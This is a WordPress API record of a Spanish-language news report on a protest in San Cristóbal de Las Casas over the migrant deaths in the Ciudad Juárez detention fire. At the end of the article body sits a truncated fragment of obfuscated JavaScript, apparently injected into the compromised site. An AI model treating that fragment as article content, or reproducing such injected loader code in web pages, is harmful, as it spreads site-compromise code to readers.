{"id":9278,"date":"2023-03-30T03:45:00","date_gmt":"2023-03-30T03:45:00","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9278"},"modified":"2023-03-30T03:45:01","modified_gmt":"2023-03-30T03:45:01","slug":"se-suman-migrantes-a-protestas-por-atentado-en-ciudad-juarez","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9278","title":{"rendered":"Se suman migrantes a protestas por atentado en Ciudad Ju\u00e1rez"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-29-at-10.51.25-AM-1024x576.jpeg\" alt=\"\" class=\"wp-image-9279\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-29-at-10.51.25-AM-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-29-at-10.51.25-AM-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-29-at-10.51.25-AM-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-29-at-10.51.25-AM-1536x864.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-29-at-10.51.25-AM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p> \u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- Integrantes de diferentes organizaciones sociales que pertenecen a la Red Nacional de Organismos Civiles de Derechos Humfanos \u201cTodos los Derechos para Todas y Todos\u201d, se manifestaron a las afueras de la estaci\u00f3n del Instituto Nacional de Migraci\u00f3n de esta ciudad, para pedir justicia por la tragedia en Ciudad Ju\u00e1rez, donde varios migrantes perdieron la vida en un incendio, por lo que pidieron la renuncia del director Francisco Gardu\u00f1o Y\u00e1\u00f1ez. En conferencia de prensa, Maricela Reyes de Voces Mesoamericanas, se\u00f1al\u00f3 que es necesario cambiar la pol\u00edtica migratoria en todo el pa\u00eds y asegur\u00f3 que las estaciones no son albergues, sino pr\u00e1cticamente c\u00e1rceles, por el trato inhumano que se le da a los migrantes, como lo ocurrido en el Norte del pa\u00eds, donde aseguran el incendio no fue un accidente. \u201cLo ocurrido constituyen hechos de responsabilidad por parte de las autoridades del Estado Mexicano, al tener bajo custodia a personas en movilidad durante su tr\u00e1nsito por M\u00e9xico, en distintos momentos organizaciones de derechos humanos han denunciado que los albergues migratorios son c\u00e1rceles y centros de detenci\u00f3n y privaci\u00f3n arbitraria de la libertad de personas que buscan refugio o asilo pol\u00edtico en el extranjero, al ser expulsados de su pa\u00eds por las condiciones de violencia estructural que padecen\u201d. Por su parte, David Morales dijo es necesario las autoridades acaten el resolutivo de la Suprema Corte de Justicia de la Naci\u00f3n n\u00famero 184\/2022 que declara inconstitucional el procedimiento de revisi\u00f3n migratoria, que se efect\u00faa en lugares distintos al de tr\u00e1nsito internacional que deriva en la detenci\u00f3n y alojamiento en estaciones migratorias del INM. \u201cEl recrudecimiento de las pol\u00edticas migratorias ha generado un ambiente propicio para el aumento de violaciones a derechos humanos cometidas por autoridades contra la poblaci\u00f3n migrante, que no son investigadas ni castigadas como los hechos recientes del 27 de marzo en la Estancia Provisional de Ciudad Ju\u00e1rez\u201d, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- Integrantes de diferentes organizaciones sociales que pertenecen a la Red Nacional de Organismos Civiles de Derechos Humfanos \u201cTodos los Derechos para Todas y Todos\u201d, se manifestaron a las afueras de la estaci\u00f3n del Instituto Nacional de Migraci\u00f3n de esta ciudad, para pedir justicia por la tragedia en Ciudad Ju\u00e1rez, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9279,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-9278","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9278","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9278"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9278\/revisions"}],"predecessor-version":[{"id":9280,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9278\/revisions\/9280"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9279"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9278"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9278"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9278"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}